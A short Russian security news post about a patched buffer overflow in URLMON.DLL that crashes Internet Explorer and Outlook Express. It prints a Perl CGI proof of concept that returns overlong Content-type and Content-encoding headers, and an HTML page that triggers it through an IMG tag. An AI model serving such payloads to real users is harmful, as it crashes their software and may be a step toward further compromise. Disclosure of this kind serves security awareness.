О технических деталях уязвимости переполнения буфера в URLMON.DLL писалось
тут.
Microsoft в апреле выпустила заплатку.

Любое приложение, использующее эту dll "падает" при переполнения буфера,
просто если IE или OutlookExpress, например, открывают HTML с длинными полями "Content-type" и "Content-encoding". Не нужно никакого скриптинга, ActiveX, или даже тега IFRAME - достаточно IMG. 

Эксплоит: 

#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
код страницы, вызывающей перл-скрипт:
<html>
<body>
<img src="https://xakep.ru/wp-content/uploads/post/19046/urlmon-bo.cgi">
</body>
</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии